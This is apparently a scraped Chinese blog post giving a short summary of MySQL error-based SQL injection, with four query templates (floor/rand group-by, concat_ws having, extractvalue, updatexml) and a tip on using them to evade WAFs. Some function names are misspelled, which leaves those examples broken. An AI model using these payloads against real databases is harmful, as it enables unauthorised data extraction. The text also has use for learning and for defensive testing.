2. 程式人生 > >sql報錯注入總結【積累中】

sql報錯注入總結【積累中】

阿新 發佈:2019-02-11

==========================第一次總結嘗試==============================

首先放一下測試的表


第一條報錯注入語句:

select password from sql_test where username = 'admin' and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

concat內為具體報錯語句


第二條報錯注入語句:

 select * from sql_test where id = 1 or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1;

version處替換成報錯語句

第三條報錯語句

 select * from sql_test where id = 1 and extractvalue(1,concat(0x5c,databse()));

database處換成報錯語句


第四條報錯語句

 select * from sql_test where id = 1 and updataxml(1,concat(0x5c,databse()));

database處換成報錯語句


順便提一句updataxml和extractvalue可以用於注入的時候進行繞過waf,用法找sql文件看一下吧

報錯語句替換,最核心的還是concat()函式

相關推薦

sql注入總結積累

==========================第一次總結嘗試============================== 首先放一下測試的表 第一條報錯注入語句: select passwo

ctf sql注入關鍵詞繞過積累

                寫在前面:這個部落格知識點來源於個人ctf練習比賽中積累的知識點及網路中各個部落格的總結點,這裡做測試和記錄0x00 sql注入理解    SQL注入能使攻擊者繞過認證機制,完全控制遠端伺服器上的資料庫。 SQL是結構化查詢語言的簡稱,它是訪問資料庫的事實標準。目前,大多數We

zabbix服務器環境--安裝過程解決:Error: Package

解決 could gen 分析 finish cli agent base 通過 # 錯誤提示: --> Finished Dependency Resolution Error: Package: php-ldap-5.4.16-42.el7.x86_64 (bas

sql注入例項

題目地址 bugku 多次 http://123.206.87.240:9004/ 本地有兩個部分,第一關的介面如下, 加上單引號出現報錯,再加上23%可以顯示正常的介面,發現過濾了很多的字元,在這裡用異或(^)的方式檢查過濾了哪些字元, 異或:當同時為真或者假的時候為假 然後就可以構造

CSS - 移動端 常見小bug整理與解決方法總結更新

mic ros class clas 問題 像素 css strong 常見問題 常見問題總結與整理系列~ 1. border一像素在手機上看著有點粗的問題: 原理是因為:1px在手機上是使用2dp進行渲染的 換成 border: 0.5像素?是不行的!

SQL註入總結

字段 name tab extra SQ password get upd 報錯 1.Floor()報錯註入 關於Floor報錯註入原理可以看http://blog.51cto.com/wt7315/1891458 獲取數據庫 select count(*),(conca

SQL注入注入函式彙總

1.floor() id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a) 原理:https://b

sql注入注入原理解析

sql注入報錯注入原理詳解 前言 我相信很多小夥伴在玩sql注入報錯注入時都會有一個疑問,為什麼這麼寫就會報錯?曾經我去查詢的時候,也沒有找到滿意的答案,時隔幾個月終於找到搞清楚原理,特此記錄,也希望後來的小夥伴能夠少走彎路 0x01

實驗吧WP(web部分)簡單的登入題,後臺登入,加了料的注入,認真一點,你真的會PHP嗎?

一. 簡單的登入題這道題一點也不簡單,用到cbc位元組翻轉攻擊等技術,先跳過這題,想了解可看這裡。二. 後臺登入http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php這道題給了一個登入框,第一反應是sql注入,提交了一個1上去後發現

SQL注入注入

第一類 group by 與 floor rand 函式的報錯 payload (select count(*) from (select 1 union select 2 union selec

Eclipsexml配置檔案原因總結

1)使用Eclipse開發工具,從SVN或者GIt上down下來的專案有的XML檔案報錯(提交上去的程式碼都是沒有問題的),而在本地Eclipse中卻顯示有問題,一般原因是Eclipse中對專案工程的校驗,點工程右鍵>Properties>Validation

mybatisgroup by 語句SQL,原因是MySQL版本的group規則預設是:only_full_group_by

報錯資訊:......not in GROUP BY clause and contains nonaggregated column ......  which is not functionally dependent on columns in GROUP BY cla

使用hibernate過程,遇到的一些sql

       現在進入了一家新公司,已經快2個月了。公司是做電子政務的,產品已經很成熟了。現在每天的工作就是針對各個專案的產品,完成JIRA上分配來的各種任務,有開發任務、bug修復、需求改進等。現在已經很熟悉專案的業務和架構了,但還是遇到各種各樣的問題,現在儘量把遇到的問題

SQL注入——聯合查詢和注入

1.別人可能用一個括號將要查詢的內容闊在一起了  可以使用)將其閉合2.還有人可能過濾掉了關鍵字可以使用如下方法anandd   selecselectt如果URL中把=號過濾掉了可以使用like進行模糊查詢報錯注入中sql裡 0x3a表示一個冒號具體用法and (selec

androidstudio 執行R檔案突然問題總結

1.    選擇File-->Project Structure-->在左邊選擇出錯的專案名-->修改 Build Tools Version--->再改回來--->OK  (有效次數最多的解決辦法) 2.    佈局檔案出錯或資原始檔出錯,自

bugku的多次(異或注入,updatexml注入,union過濾和locate繞過,布林盲注)writeup

首先我們判斷一下是什麼注入型別 注意輸入的是英文字元',中文不會轉變為%27,報錯,說明是字元注入 這時候我們就要判斷一下SQL網站過濾了什麼內容,我們可以使用異或注入來判斷哪些字串被過濾掉了 http://120.24.86.145:9004/1ndex.ph

DB2 sql後查證原因與解決問題的方法

sta form con ica before lac tail reference ima 1.對於執行中的報錯,可以在db2命令行下運行命令 : db2=>? SQLxxx 查看對應的報錯原因及解決方法。 2.錯誤SQL0206N SQLSTATE=42703

Oracle執行SQLORA-00922

log define sql option -1 nbsp 執行sql 問題 val 問題描述: 對Oracle數據庫執行序列化腳本出錯,ora-00922 missing or invalid option #無效的選項 問題解決:

maven 編譯 java: -source 1.5 不支持switch 存在字符串

tar compiler com cti compile plugins class mpi 編譯 <build> <defaultGoal>compile</defaultGoal> <pluginManagement>

oracle 歸納總結

查詢 有一種 比較 自動提示 概率 情況 oracle 正常 ora-00904 1.ORA-00904   正常情況下是找不到字段(大概率字段名字錯了)   還有一種比較特別的情況實在設計DB的時候,字段小寫,在sql查詢工具自動提示的時候都是大寫,造成字段找不到的情